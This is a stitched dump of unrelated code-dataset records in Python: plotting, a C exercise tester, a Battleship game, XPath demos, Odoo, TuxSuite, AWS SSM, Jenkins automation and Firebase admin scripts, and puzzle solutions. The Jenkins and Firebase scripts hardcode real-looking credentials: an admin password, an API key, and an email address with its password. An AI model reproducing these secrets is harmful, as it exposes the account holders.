right=0.9, top=0.85)\n fig.set_size_inches(8, 4) # A4 imperial size\n # Get title (if to long)\n title_str = 'AA-Profil for ' + str(aa_des[scale_id])[0].lower() + str(aa_des[scale_id])[1:]\n title = split_title(title_str) # Split title helper function\n if '\\n' in title:\n fig.suptitle(title, fontsize=7, fontweight='bold')\n else:\n fig.suptitle(title, fontsize=8, fontweight='bold')\n # Save plot\n plt.savefig(output + '/' + str(scale_id).strip('H ') + '.png')\n plt.close()\n\n\n# 4. Plotting Value count (KS-module)\ndef plotting_value_count(file_sub, file_non_sub, significant_scales):\n \"\"\"Plotting of value count distribution of\n significant scale as (a) barplot, (b) kde\"\"\"\n output = output_folder + \"/Value_count\"\n count_sub_dict, count_non_sub_dict, count_df_dict = get_value_count(file_sub, file_non_sub)\n # Plotten\n for scale_id in significant_scales:\n # Melted for barplot\n fig, ax = plt.subplots()\n sns.set_context('paper')\n melted = pd.melt(count_df_dict[scale_id], ['Value'], var_name='Sub/Non-Sub',\n value_name='Count') # Use dictionary of count dataframes!\n # Plotting\n ax = sns.barplot(x='Value', y='Count', hue='Sub/Non-Sub', data=melted)\n plt.setp(ax.get_xticklabels(), rotation=90)\n plt.ylabel(\"Count [%]\", fontsize=9)\n plt.xlabel('Value', fontsize=9)\n fig.subplots_adjust(bottom=0.15, top=0.85)\n # Get title\n title_str = 'Value count for ' + str(aa_des[scale_id])[0].lower() + str(aa_des[scale_id])[1:]\n title = split_title(title_str) # Split title helper function\n if '\\n' in title:\n plt.title(title, fontsize=8, fontweight='bold')\n elif len(title) > 75:\n plt.title(title, fontsize=8, fontweight='bold')\n else:\n plt.title(title, fontsize=10, fontweight='bold')\n # Save plot\n plt.savefig(output + '/' + str(scale_id).strip('H ') + '_Value_count.png')\n plt.close()\n # sns.jointplot(x=\"Sub\", y=\"Non_sub\", data=count_df_dict[scale_id]) # Use dictionary of count dataframes!\n # plt.savefig(output_folder + str(scale_id) + '_joinplot.png')\n # plt.close()\n\ndef main(file_sub, file_non_sub):\n significant_scales, top_scales, correlated_scales = scale_filter(file_sub, file_non_sub)\n # a1 = aa_destribution_barplot(file_sub)\n # a2 = aa_destribution_barplot(file_non_sub)\n # b = auc_distribution_displot(file_sub, file_non_sub)\n #profile_plot(file_sub, file_non_sub)\n plotting_value_count(file_sub, file_non_sub, top_scales)\n\nif __name__ == \"__main__\":\n main(file_sub, file_non_sub)\n\n# Supplement\n# 3. Plotting AUC Profiles for top_scales\n\"\"\"\ndef profile_plot_total(file_sub, file_non_sub):\n Plot of aa_index profiles of sequences\n a) In: profile_dictionary\n b) Out: Plots of profiles\n significant_scales, top_scales, correlated_scales = scale_filter(file_sub, file_non_sub)\n id_sequence_sub, id_name_sub, df_sequence_sub = get_sequences(file_sub)\n id_sequence_non_sub, id_name_non_sub, df_sequence_non_sub = get_sequences(file_non_sub)\n sequence_value_sub = profile_dictionary(file_sub)\n sequence_value_non_sub = profile_dictionary(file_non_sub)\n\n for scale_id in top_scales: # sorted(sequence_value):\n # Create path and dictionary for top scales\n output_sub = output_folder + str(aa_des[scale_id])\n output_non_sub = output_folder + str(aa_des[scale_id]) + '/Non-Substrate'\n os.makedirs(output_sub, exist_ok=True)\n os.makedirs(output_non_sub, exist_ok=True)\n # Create plots for substrates (new directory for non-substrate)\n for i, seq_id in enumerate(sequence_value_sub[scale_id]):\n y = sequence_value_sub[scale_id][seq_id][\"Values\"]\n x = np.arange(len(y))\n x_ticks_labels = sequence_value_sub[scale_id][seq_id][\"Sequence\"]\n plt.plot(x, y)\n plt.xticks(x, x_ticks_labels)\n plt.title(aa_des[scale_id] + \"\\n\" + id_name_sub[seq_id])\n plt.savefig(output_sub + \"/\" + str(scale_id) + \"_\" + str(id_name_sub[seq_id]))\n plt.close(fig)\n for j, seq_id in enumerate(sequence_value_non_sub[scale_id]):\n y = sequence_value_non_sub[scale_id][seq_id][\"Values\"]\n x = np.arange(len(y))\n x_ticks_labels = sequence_value_non_sub[scale_id][seq_id][\"Sequence\"]\n fig, ax = plt.subplots()\n plt.plot(x, y)\n plt.xticks(x, x_ticks_labels)\n plt.title(aa_des[scale_id] + \"\\n\" + id_name_non_sub[seq_id])\n plt.savefig(output_non_sub + \"/\" + str(scale_id) + \"_\" + str(id_name_non_sub[seq_id]))\n plt.close(fig)\n\"\"\"\n","sub_path":"xOld/Plotting.py","file_name":"Plotting.py","file_ext":"py","file_size_in_byte":11307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590017695","text":"#!/usr/bin/env python3\n#git:alexmayor-21\n\nimport os\nimport re\nimport shlex\nimport subprocess\nimport sys\n\nclass Tester(object):\n def __init__(self):\n self.exercises = self.get_exercises()\n \n def get_exercises(self):\n root = os.path.abspath('..')\n cd = os.path.abspath('.')\n exercises = list()\n for direc in os.listdir(root):\n if not re.match(\"ex[0-9]+\", direc):\n continue\n ex = Exercise()\n ex.name = direc\n ex.dir = os.path.join(root, direc)\n ex.bin = os.path.join(cd, 'someweirdname')\n ex.src = list()\n for file in os.listdir(ex.dir):\n if file.endswith('.c'):\n ex.src.append(os.path.join(ex.dir, file))\n ex.cd = cd\n testfile = os.path.join(cd, direc + \".test\")\n if not os.path.isfile(testfile):\n print (\"Missing tests for %s\\n\" % ex, end=\"\")\n continue\n ex.testfile = testfile\n exercises.append(ex)\n return (exercises)\n \n def run(self):\n for ex in self.exercises:\n ex.run_tests(verbose=False)\n\nclass Exercise(object):\n \n def run_tests(self, verbose=False):\n self.process_testfile()\n print (\"********** %s **********\\n\" % self.name, end=\"\")\n self.compilation()\n for i, test in enumerate(self.tests, 1):\n print (\"===== test %i =====\\n\" % i, end=\"\")\n self.test_io(test, verbose=False)\n self.cleanup()\n \n def process_testfile(self):\n PreP = TestFilePreP(self.testfile)\n if os.path.join(self.dir, 'main.c') not in self.src:\n main_path = os.path.join(self.cd, 'main.c') \n self.src.append(main_path)\n PreP.write_main(main_path)\n self.tests = PreP.get_tests()\n \n def compilation(self):\n call = [\"gcc\", \"-Werror\", \"-Wall\", \"-Wextra\"]\n call += self.src\n call += [\"-o\", self.bin]\n subprocess.check_output(call)\n \n def test_io(self, test, verbose=False):\n if test.message and verbose:\n print (test.message)\n call = [self.bin]\n call += test.input\n print (\" \".join(shlex.quote(s) for s in call) + '\\n', end=\"\")\n self.output = subprocess.Popen(call, stdout=subprocess.PIPE)\n self.output = self.output.stdout.readlines()\n self.output = \"\".join(line.decode() for line in self.output)\n if self.output == test.check:\n print (\"ok\\n\\n\", end=\"\")\n else:\n print (\"FAILED!\\n\")\n print (\"\\nget output:\\n%s\" % self.output.replace('\\n', '$\\n'), end=\"\")\n print (\"\\ncorrect output:\\n%s\" % test.check.replace('\\n', '$\\n'), end=\"\")\n sys.exit(1)\n \n def cleanup(self):\n main_created = os.path.join(self.cd, 'main.c')\n if os.path.isfile(main_created):\n os.remove(main_created)\n os.remove(self.bin)\n\nclass Test(object):\n def __init__(self):\n self.message = str()\n self.input = list()\n self.check = str()\n self.mode = None\n \n def add(self, line):\n if line.startswith('#'):\n self.message += line\n elif line.startswith('<'):\n self.mode = 'input'\n elif line.startswith('>'):\n self.mode = 'check'\n else:\n if self.mode == 'input':\n self.input += shlex.split(line)\n if self.mode == 'check':\n self.check += line\n\nclass TestFilePreP(object):\n def __init__(self, path):\n with open(path, 'r') as file:\n self.content = file.readlines()\n self.index = 0;\n self.process_main()\n \n def process_main(self):\n self.skip_empty()\n if \"===== main.c =====\" in self.content[self.index]:\n self.index += 1\n self.main_body = list()\n while \"===== tests =====\" not in self.content[self.index]:\n self.main_body.append(line)\n self.index += 1\n self.index += 1\n\n def write_main(self, name=\"main.c\"):\n with open(name, 'w') as file:\n for line in self.main_body:\n file.write(line)\n self.main = name\n \n def skip_empty(self):\n while self.content[self.index].isspace():\n self.index += 1\n \n def get_tests(self):\n self.skip_empty()\n tests = list()\n test = Test()\n while self.index < len(self.content):\n line = self.content[self.index]\n if not line.isspace():\n if line.strip().endswith('$'):\n line = line.strip()[:-1]\n test.add(line)\n self.index += 1\n else:\n tests.append(test)\n self.skip_empty()\n test = Test()\n if self.index == len(self.content) - 1:\n tests.append(test)\n return tests\n\n\nif __name__ == \"__main__\":\n\tmyTester = Tester()\n\tmyTester.run()\n","sub_path":"42-checker.py","file_name":"42-checker.py","file_ext":"py","file_size_in_byte":5051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"559600297","text":"import random\n\nclass Game:\n\n board_size = 10\n\n def __init__(self):\n self.ship_lengths = [5,4,3,3,2]\n self.remaining_hits = sum(self.ship_lengths)\n self.board = [[0] * self.board_size for i in xrange(self.board_size)]\n for length in self.ship_lengths:\n while True:\n vertical = (random.random() > 0.5)\n x_coord = random.randint(0,self.board_size - 1 if vertical else self.board_size-1-length) #coords of upper right square\n y_coord = random.randint(0,self.board_size-1-length if vertical else self.board_size-1)\n if vertical:\n if y_coord + length <= self.board_size and all(self.board[y_coord + k][x_coord] == 0 for k in xrange(length)):\n for k in xrange(length):\n self.board[y_coord + k][x_coord] = 1\n break\n else:\n if x_coord + length <= self.board_size and all( self.board[y_coord][x_coord + k] == 0 for k in xrange(length)):\n for k in xrange(length):\n self.board[y_coord][x_coord + k] = 1\n break\n\n def play(self, x_coord, y_coord):\n if self.board[y_coord][x_coord] == 1:\n self.remaining_hits -=1\n if self.remaining_hits == 0:\n return -1\n return 1\n return 0\n","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"142231951","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n利用XPath定位某个或多个节点, 再调用相应的方法获取内容或属性\n常用的规则:\n nodename: 选取此节点的所有字节点\n / : 从当前节点选取直接字节点\n // : 从当前节点选取子孙节点\n . : 选取当前节点\n .. : 选取当前节点的父节点\n @ : 选取属性, 返回属性值列表\n\n运算符\n and or mod +-*/ div = != > >=\n\n\"\"\"\n\nfrom lxml import etree\n\n\ntext = \"\"\"\n\n\"\"\"\n\n\ndef main():\n # 构造XPath解析对象\n html = etree.HTML(text)\n # 自动修正HTML代码, 补全缺少的html标签\n result = etree.tostring(html)\n print(result.decode('utf-8'))\n\n # 读取文本文件进行解析\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n result = etree.tostring(html)\n print(result.decode('utf-8'))\n\n\ndef nodes():\n # 获取全部节点\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # 在XPath对象上调用方法xpath(),\n result = html.xpath('//*')\n print(result)\n\n # 获取指定节点\n result = html.xpath('//li')\n print(result)\n\n\ndef subnode():\n # 获取子节点\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # 获取所有li标签所有直接a子节点\n result = html.xpath('//li/a')\n print(result)\n\n # 获取子孙节点\n result = html.xpath('//ul//a')\n print(result)\n\n\ndef prenode():\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # ../获取父节点\n result = html.xpath('//a[@href=\"link4.html\"]/../@class')\n print(result)\n\n # parent::获取父节点\n result = html.xpath('//a[@href=\"link4.html\"]/parent::*/@class')\n print(result)\n\n\ndef attribute():\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # 筛选属性的标签\n result = html.xpath('//li[@class=\"item-0\"]')\n print(result)\n\n\ndef text():\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # 获取的是修正后的HTML代码的换行符, 不包括内部a标签的文本值\n result = html.xpath('//li[@class=\"item-0\"]/text()')\n print(result)\n # 获取的是li标签和a标签的文本值, 会带有修正的换行符 获取所有子孙标签文本值\n result = html.xpath('//li[@class=\"item-0\"]//text()')\n print(result)\n # 获取的是a标签的文本值, 期望结果\n result = html.xpath('//li[@class=\"item-0\"]/a/text()')\n print(result)\n\n\ndef attr():\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # 获取指定标签下的属性值\n result = html.xpath('//li/a/@href')\n print(result)\n\n # 多属性值取值, 使用contains(@attr, value)函数\n text = \"\"\"\n
  • first item
  • \n \"\"\"\n html = etree.HTML(text)\n result = html.xpath('//li[contains(@class, \"li\")]/a/text()')\n print(result)\n\n # 多属性取值, 使用and连接  contains(@attr, value) and @attr2=value2\n text = \"\"\"\n
  • first item
  • \n \"\"\"\n html = etree.HTML(text)\n result = html.xpath('//li[contains(@class, \"li\") and @name=\"item\"]/a/text()')\n print(result)\n\n\ndef sequence():\n html = etree.parse(\"../resources/input/html_.html\", etree.HTMLParser())\n # 通过索引控制目标节点, 从1开始\n # last() 取最后一个\n # last()-1 取倒第二个\n # position()<5 取前四个\n result = html.xpath('//li[position()<5]/a/text()')\n print(result)\n\n\ndef axis():\n text = \"\"\"\n \n \"\"\"\n html = etree.HTML(text)\n\n # ancestor:: 获取所有祖先节点 *表示全部节点, ul表示具体节点\n result1 = html.xpath('//li[1]/ancestor::*')\n result2 = html.xpath('//li[1]/ancestor::ul')\n print(result1, ' + ', result2)\n\n # attribute:: 获取某个节点所有属性值, 指定属性值\n result1 = html.xpath('//li[1]/attribute::*')\n result2 = html.xpath('//li[1]/attribute::id')\n print(result1, ' + ', result2)\n\n # child:: 获取所有直接字节点, 可以添加限定条件\n result1 = html.xpath('//li[1]/child::a[@href=\"link1.html\"]//text()')\n result2 = html.xpath('//li[1]/child::*')\n print(result1, ' + ', result2)\n\n # descendant:: 获取所有子孙节点, 可以增加限定条件\n result = html.xpath('//li[1]/descendant::span')\n print(result)\n\n # following::* 获取当前节点(不包括当前节点的字节点)之后的所有节点(包括字节点)\n result = html.xpath('//li[1]/following::*[2]/text()')\n print(result)\n\n # following-sibling::* 获取当前节点后面的所有同级节点\n result = html.xpath('//li[1]/following-sibling::*[1]//text()')\n print(result)\n\n\nif __name__ == \"__main__\":\n # main()\n\n # 所有节点\n # nodes()\n\n # 子节点\n # subnode()\n\n # 父节点\n # prenode()\n\n # 属性匹配\n # attribute()\n\n # 获取文本值\n # text()\n\n # 获取属性值\n # attr()\n\n # 按顺序选择节点\n # sequence()\n\n # 轴 获取子元素, 兄弟元素, 父元素, 祖先元素\n axis()\n","sub_path":"modules/xpath_.py","file_name":"xpath_.py","file_ext":"py","file_size_in_byte":5931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228257722","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models,fields,api\n\nclass StockPickingInherit(models.Model):\n _inherit = 'stock.picking'\n\n emp_request_id = fields.Many2one('employee.request', 'Employee Request')\n partner_id = fields.Many2one('res.partner')\n type = fields.Selection([\n ('m', 'Publications'),\n ('fm', 'foodstuffs'),\n ('s', 'Watering'),\n ('a', 'Origins'),\n ('other', 'Other')\n ])\n\n @api.multi\n def write(self, vals):\n return_id = super(StockPickingInherit, self).write(vals)\n total_transfer = 0\n for rec in self:\n if len(rec.emp_request_id) > 0:\n employee_request = self.env['employee.request'].browse(rec.emp_request_id.id)\n for transfer in employee_request.transfer_ids:\n if transfer.state == 'done':\n total_transfer += 1\n if total_transfer == len(employee_request.transfer_ids):\n employee_request.write({'state': 'final_done'})\n\n return return_id\n\nclass StockMoveInherit(models.Model):\n _inherit = 'stock.move'\n\n partner_id = fields.Many2one('res.partner')\n","sub_path":"isky_employee_request/models/stock_picking_inherit.py","file_name":"stock_picking_inherit.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"288204798","text":"#!/usr/bin/env python3\nimport argparse\nimport pathlib\nimport sys\nimport yaml\n\n\n# Aliases makes this YAML unreadable\n# https://ttl255.com/yaml-anchors-and-aliases-and-how-to-disable-them/\nclass NoAliasDumper(yaml.SafeDumper):\n def ignore_aliases(self, data):\n return True\n\n\ndef parse_args(trees):\n parser = argparse.ArgumentParser(description=\"Generate TuxSuite YML.\")\n parser.add_argument(\"tree\",\n help=\"The git repo and ref to filter in.\",\n choices=[tree[\"name\"] for tree in trees])\n return parser.parse_args()\n\n\ndef get_config():\n # Trusted input.\n # https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation\n return yaml.load(sys.stdin, Loader=yaml.FullLoader)\n\n\ndef get_repo_ref(config, tree_name):\n for tree in config[\"trees\"]:\n if tree[\"name\"] == tree_name:\n return tree[\"git_repo\"], tree[\"git_ref\"]\n\n\ndef emit_tuxsuite_yml(config, tree):\n print(\"# DO NOT MODIFY MANUALLY!\")\n print(\"# This file has been autogenerated by invoking:\")\n print(\n \"# $ ./generate_tuxsuite.py < generator.yml {} > tuxsuite/{}.tux.yml\".\n format(tree, tree))\n print(\"# Invoke tuxsuite via:\")\n print(\n \"# $ tuxsuite build-set --set-name defconfigs --json-out builds.json --tux-config tuxsuite/{}.tux.yml\"\n .format(tree))\n tuxsuite_buildset = {\n 'sets': [\n {\n 'name': 'defconfigs',\n 'builds': [],\n }\n ]\n } # yapf: disable\n repo, ref = get_repo_ref(config, tree)\n ci_folder = pathlib.Path(__file__).resolve().parent\n with open(ci_folder.joinpath(\"LLVM_TOT_VERSION\")) as f:\n max_version = int(f.read())\n defconfigs = []\n distribution_configs = []\n allconfigs = []\n for build in config[\"builds\"]:\n if build[\"git_repo\"] == repo and build[\"git_ref\"] == ref:\n arch = build[\"ARCH\"] if \"ARCH\" in build else \"x86_64\"\n toolchain = \"clang-\"\n toolchain += \"nightly\" if build[\n \"llvm_version\"] == max_version else str(build[\"llvm_version\"])\n\n current_build = {\n \"git_repo\": build[\"git_repo\"],\n \"git_ref\": build[\"git_ref\"],\n \"target_arch\": arch,\n \"toolchain\": toolchain,\n \"kconfig\": build[\"config\"],\n \"targets\": build[\"targets\"]\n }\n if \"kernel_image\" in build:\n current_build.update({\"kernel_image\": build[\"kernel_image\"]})\n if \"make_variables\" in build:\n current_build.update(\n {\"make_variables\": build[\"make_variables\"]})\n\n if \"defconfig\" in str(build[\"config\"]):\n defconfigs.append(current_build)\n elif \"https://\" in str(build[\"config\"]):\n distribution_configs.append(current_build)\n else:\n allconfigs.append(current_build)\n\n tuxsuite_buildset[\"sets\"][0][\"builds\"] = defconfigs\n if distribution_configs:\n tuxsuite_buildset[\"sets\"] += [{\n \"name\": \"distribution_configs\",\n \"builds\": distribution_configs\n }]\n if allconfigs:\n tuxsuite_buildset[\"sets\"] += [{\n \"name\": \"allconfigs\",\n \"builds\": allconfigs\n }]\n print(\n yaml.dump(tuxsuite_buildset,\n Dumper=NoAliasDumper,\n width=1000,\n sort_keys=False))\n\n\nif __name__ == \"__main__\":\n # The list of valid trees come from the input, so we parse the input, then\n # check command line flags.\n config = get_config()\n args = parse_args(config[\"trees\"])\n emit_tuxsuite_yml(config, args.tree)\n","sub_path":"generate_tuxsuite.py","file_name":"generate_tuxsuite.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499739049","text":"import os\nimport boto3\nimport base64\nfrom urllib.error import HTTPError, URLError\nfrom urllib.request import Request, urlopen\n\ndef get_logger():\n #return: logger object with logging level set\n\n import logging\n\n #Get logging level from environment variable\n LOGLEVEL = os.environ.get('LOGGING_LEVEL', 'INFO').upper()\n level = logging.getLevelName(LOGLEVEL)\n\n logger = logging.getLogger()\n logger.setLevel(level)\n #Mute verbose boto3 and request library logging\n logging.getLogger('boto3').setLevel(logging.CRITICAL)\n logging.getLogger('botocore').setLevel(logging.CRITICAL)\n logging.getLogger('urllib3').setLevel(logging.CRITICAL)\n\n return logger\n\ndef list_active_sessions(session):\n #param session: boto3 session object\n #return: list of active ssm sessions\n\n ssm_client = session.client('ssm')\n paginator = ssm_client.get_paginator('describe_sessions')\n response_iterator = paginator.paginate(\n State = 'Active'\n )\n ssm_sessions = []\n for page in response_iterator:\n for session in page['Sessions']:\n ssm_sessions.append(session['SessionId'])\n\n return ssm_sessions","sub_path":"src/revoke_session/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535991941","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def maxAncestorDiff(self, root: TreeNode) -> int:\n self.ret = 0\n self.traverse(root)\n return self.ret\n \n def traverse(self, root):\n from_left = self.traverse(root.left) if getattr(root.left, 'val', None) is not None else [root.val, root.val]\n from_right = self.traverse(root.right) if getattr(root.right, 'val', None) is not None else [root.val, root.val]\n \n m = min(root.val, from_left[0], from_left[1], from_right[0], from_right[1])\n M = max(root.val, from_left[0], from_left[1], from_right[0], from_right[1])\n \n self.ret = max(self.ret, abs(m - root.val), abs(M - root.val))\n return [m, M]\n","sub_path":"1026_maximum-difference-between-node-and-ancestor.py","file_name":"1026_maximum-difference-between-node-and-ancestor.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601936808","text":"import datetime\nimport time\nimport calendar\nimport jenkins\nurl='http://10.22.158.60:8080/'\nusername='admin'\npassword='Aruba@123'\nserver = jenkins.Jenkins(url,username=username,password=password)\nversion=server.get_version()\nuser=server.get_whoami()\nprint(version)\nprint(('Hello %s from Jenkins %s' % (user['fullName'], version)))\nimport xml.etree.ElementTree as ET\n\n\ndef convert_xml_file_to_str():\n tree = ET.parse('C:\\\\centerdev\\\\rest-automation\\\\centerdev\\\\manage_jenkins\\\\config_job_xml\\\\job.xml')\n root = tree.getroot()\n result = str(ET.tostring(root, encoding='utf8', method='xml').decode())\n return result\n\ndef executeSuite(projectName,releaseName,suiteName,list_test_cases=None):\n\n job_name = ''\n project_name = server.get_job_name(projectName)\n if project_name == projectName:\n print(\"Project Folder is present\")\n else:\n server.create_job(projectName,jenkins.EMPTY_FOLDER_XML)\n print(\"Project Folder Created New\")\n\n release_name = projectName+'/'+releaseName\n release_name_from_server = server.get_job_name(projectName+'/'+releaseName)\n\n print(release_name_from_server)\n if releaseName == release_name_from_server:\n print(\"Release folder is present\")\n else:\n server.create_job(release_name, jenkins.EMPTY_FOLDER_XML)\n print(\"Release Folder Created New\")\n\n time_stamp = str(calendar.timegm(time.gmtime()))\n print(time)\n suite_name = projectName+'/'+releaseName+'/'+suiteName+'_'+time_stamp\n suite_name_from_server = server.get_job_name(suite_name)\n job_name = suite_name\n if suiteName == suite_name_from_server:\n print(\"Suite Job Does exists\")\n else:\n xml_file=convert_xml_file_to_str()\n print(xml_file)\n suite_file = getsuite_filename('2', suiteName)\n if list_test_cases== None:\n\n command = 'nosetests '+suite_file\n print(type(command))\n print(command)\n config = xml_file.replace('$COMMAND',command)\n job_name=suite_name\n server.create_job(job_name,config)\n\n else:\n command = 'nosetests ' + suite_file + ' '\n for testcase in list_test_cases:\n command = command + testcase + ' '\n print(command)\n config_file = convert_xml_file_to_str()\n new_config = config_file.replace('$COMMAND', command)\n server.create_job(job_name, new_config)\n\n\n next_bn = server.get_job_info(job_name)['nextBuildNumber']\n print(\"Next Build Number is \",next_bn)\n print(next_bn)\n server.build_job(job_name)\n\n\n\ndef getsuite_filename(customer_id,suite_name):\n suite_dict = {'calc' : 'test_calculator.py,'}\n for k,v in list(suite_dict.items()):\n if k == suite_name:\n return suite_dict[k]\n\ndef execute_specific_test_cases(testcaselist,suite_name,projectName,releaseName):\n suite_file=getsuite_filename('2',suite_name)\n print(suite_file)\n command='nosetests '+suite_file+' '\n for testcase in testcaselist:\n command = command + testcase + ' '\n print(command)\n config_file=convert_xml_file_to_str()\n new_config = config_file.replace('$COMMAND',command)\n print(new_config)\n server.reconfig_job(projectName + '/' + releaseName + '/' + suite_name, new_config)\n print(\"Going to build re-configured job\")\n job_name=projectName + '/' + releaseName + '/' + suite_name\n server.build_job(job_name)\n return command\n\n\nexecuteSuite('aw10_new','early_access_new','calc')\n\n#execute_specific_test_cases(['test_add','test_minus'],'calc','aw10_new','early_access_new')\n\n\n","sub_path":"centerdev/manage_jenkins/get_jenkins_data.py","file_name":"get_jenkins_data.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"462280183","text":"import pyrebase\n\nconfig = {\n \"apiKey\": \"AIzaSyBO3tDLbtmVZ1ew4dGWLn_fvXJPVnbv90I\",\n \"authDomain\": \"flux-00.firebaseapp.com\",\n \"databaseURL\": \"https://flux-00.firebaseio.com\",\n \"storageBucket\": \"flux-00.appspot.com\"\n}\n\nfirebase = pyrebase.initialize_app(config)\n\ndb = firebase.database()\nauth = firebase.auth()\nstorage = firebase.storage()\n\nemail='evev1337@gmail.com'\npassword='naderevnu123'\n\nuser=auth.sign_in_with_email_and_password(email, password)\n\nuser=auth.refresh(user['refreshToken'])\n\ntoken = user['idToken']\n\ndef handout(amount,reason):\n amount=int(amount)\n i=input('Are you sure you want to hand out {ink} Ink for '.format(ink=amount)+str(reason)+': ')\n if i.lower() == 'y':\n print('Handing out candy...')\n users=db.child(\"Users\").get(token).val().keys()\n print(len(users))\n i=0\n for x in users:\n i+=1\n addInk(x,amount)\n push_notification(x,reason)\n print(i)\n print('Complete')\n return True\n else:\n print('Aborted')\n return False\ndef delete_note(note_id,reason='',user_id=''): #DOES NOT WORK\n print('Deleting note...')\n owners=db.child(\"Notes\").child(note_id).child('Owners').get(token).val()\n cost=int(db.child(\"Notes\").child(note_id).child('ink').get(token).val())\n print('Found {} owners'.format(len(owners)))\n print('Removing owage from owners')\n i=0\n for x in owners:\n i+=1\n created=db.child(\"Users\").child(x).child('Notes').child('createdNotes').get(token).val()\n owned=db.child(\"Users\").child(x).child('Notes').child('ownedNotes').get(token).val()\n if note_id in created:\n created.pop(created.index(note_id))\n if created == []:\n db.child(\"Users\").child(x).child('Notes').child('createdNotes').child(note_id).remove(token)\n db.child(\"Users\").child(x).child('Notes').child('createdNotes').child('None').set('Non',token)\n else:\n db.child(\"Users\").child(x).child('Notes').child('createdNotes').set(created,token)\n if note_id in owned:\n owned.pop(owned.index(note_id))\n if owned==[]:\n db.child(\"Users\").child(x).child('Notes').child('ownedNotes').child(note_id).remove(token)\n db.child(\"Users\").child(x).child('Notes').child('ownedNotes').child('None').set('Non',token)\n else:\n db.child(\"Users\").child(x).child('Notes').child('createdNotes').set(owned,token)\n addInk(x,cost)\n push_notification(x,'A note you owned has been deleted. {ink} Ink has been returned to your account'.format(ink=cost))\n print(i)\n print('Done')\n print('Deleting note...')\n db.child(\"Notes\").child(note_id).remove(token)\n if user_id != '':\n print('Pushing notification to creator')\n push_notification(user_id,reason)\n print('Complete')\n return True\ndef push_notification(id,data):\n if 'n_stack' not in db.child(\"Users\").child(id).get(token).val():\n db.child(\"Users\").child(id).child('n_stack').set(['genesis_notification'], token)\n stack=db.child(\"Users\").child(id).child('n_stack').get(token).val()\n stack.append(data)\n db.child(\"Users\").child(id).child('n_stack').set(stack, token)\n return True\ndef addInk(id,ink):\n ink=int(ink)\n try:\n nink=int(db.child(\"Users\").child(id).child('ink').get(token).val())+ink\n except:\n return False\n db.child(\"Users\").child(id).child('ink').set(nink,token)\n#handout(100,'You have recieved 100 Ink!
    Thank you for supporting our site and being alpha testers! Here is a reward of 100 Ink!')\n\n\n\n#delete_note('0061',reason='Testing so ur note has been delet sorry ani',user_id='rWnA7H4Y42TS2LkwpDJnnYrTS712')\n#some scripts...","sub_path":"scripty/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"649586312","text":"# WOO this was tough\n\nfrom math import ceil\n\nn, k = map(int, input().split())\n\nnumProblemsInChapters = list(map(int, input().split()))\n\nnumPagesInChapters = []\n\nfor numProblems in numProblemsInChapters:\n numPagesInChapters.append(ceil(numProblems / k))\n\nchNum = 1\n\ntotal = 0\n\nwhile chNum - 1 < len(numPagesInChapters):\n if numProblemsInChapters[chNum - 1] >= sum(numPagesInChapters[:chNum]):\n\n # total += 1\n numPagesByEndOfCh = sum(numPagesInChapters[:chNum])\n numProblemsInThisChapter = numProblemsInChapters[chNum - 1]\n\n # print(\"Chapter number:\", str(chNum), \"Number of pages in total by the end of this chapter:\", str(\n # numPagesByEndOfCh))\n\n currentProblemNo = 1\n currentPageNo = sum(\n numPagesInChapters[:chNum]) - numPagesInChapters[chNum - 1] + 1\n # print(currentPageNo)\n while currentPageNo <= numPagesByEndOfCh:\n # print(\"Current page number\", str(currentPageNo), \"Current problem number\", str(currentProblemNo))\n if currentProblemNo == currentPageNo:\n # print(\"SPECIAL PROBLEM: PROBLEM\", str(currentProblemNo), \"@ PAGE\", str(currentPageNo))\n total += 1\n if currentProblemNo % k == 0 or currentProblemNo >= numProblemsInThisChapter:\n currentPageNo += 1\n currentProblemNo += 1\n\n chNum += 1\n\n# print()\nprint(total)\n","sub_path":"Algorithms/Implementation/Lisa's Workbook.py","file_name":"Lisa's Workbook.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548398653","text":"\"\"\"GaussianMLPPolicy.\"\"\"\nimport numpy as np\nimport torch\n\nfrom garage.torch.modules import GaussianMLPModule\nfrom garage.torch.policies import Policy\n\n\nclass GaussianMLPPolicy(GaussianMLPModule, Policy):\n \"\"\"\n GaussianMLPPolicy.\n\n A policy that contains a MLP to make prediction based on a gaussian\n distribution.\n\n Args:\n env_spec (garage.envs.env_spec.EnvSpec): 